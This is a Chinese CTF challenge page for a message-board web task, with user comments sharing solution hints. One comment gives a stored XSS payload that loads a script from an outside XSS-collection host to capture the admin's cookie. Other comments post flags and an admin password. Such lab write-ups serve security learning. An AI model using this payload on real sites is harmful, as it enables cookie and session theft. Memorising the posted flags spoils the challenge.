留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 2734
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
skiller 2年前

db.sql是怎么搜出来的?我用dir没搜出来啊?

回复 9

BugKugirl 2年前

在线XSS平台(https://xss.pt/)生成xss代码(<sCRiPt sRC=//0x.ax/AUBv></sCrIpT>)放到留言板,xss平台直接获得cookie : flag=flag%7Bf7784e4107be555d08be73ac01569c6f%7D,将flag进行url解码(http://www.jsons.cn/urlencode)

回复 0

1317554973 2年前

拿到xss得flag填进去但不对

回复 0

17695688750 2年前

奥原来%7b和%7d是{}的asc码,我憨批了

回复 0

17695688750 2年前

我插入了图片xss,平台给我回显了这个flag=flag%7B34211b64224e890f37244b7b065fc409%7D,有人知道怎么转译成正确的flag么

回复 0
zhaiwb 2年前

%7b换成{}

回复 0

13509329442 2年前

url解码

回复 0

泡椒控卫 2年前

https://blog.csdn.net/m0_57954651/article/details/127621060

回复 0

不知名学渣 2年前

管理员账号密码[admin,011be4d65feac1a8],就是不知道怎么来的,望大佬告知

回复 0

2478660446 2年前

用xss在线平台可以试试 但是要等一段时间 flag=flag{7B57845943ba8c6225d2fbade764481e8d}

回复 0

wkxy. 2年前

用dirsearch进行目录扫描

回复 0

缺少昵称 2年前

好难啊,我是菜鸟

回复 0

WriteUp

image
丶我亚索贼六

5 金币

评分(17)

解题动态

Gyro 攻破了该题 14小时前
13667626741 攻破了该题 15小时前
YameMres 攻破了该题 1天前
geri 攻破了该题 2天前
Snngulaf 攻破了该题 2天前
KKsama 攻破了该题 3天前
linzixi 攻破了该题 3天前
zszfight 攻破了该题 4天前
toonavy 攻破了该题 5天前
燃燃然燃 攻破了该题 10天前
a1104048658 攻破了该题 10天前
unilot 攻破了该题 13天前
fxstu 攻破了该题 15天前
fuchen11 攻破了该题 15天前
她说我们只是朋友 攻破了该题 17天前
zachary 攻破了该题 17天前
13607979046 攻破了该题 18天前
buggy 攻破了该题 18天前
lmh123456 攻破了该题 19天前
szmlzw120 攻破了该题 20天前
问题反馈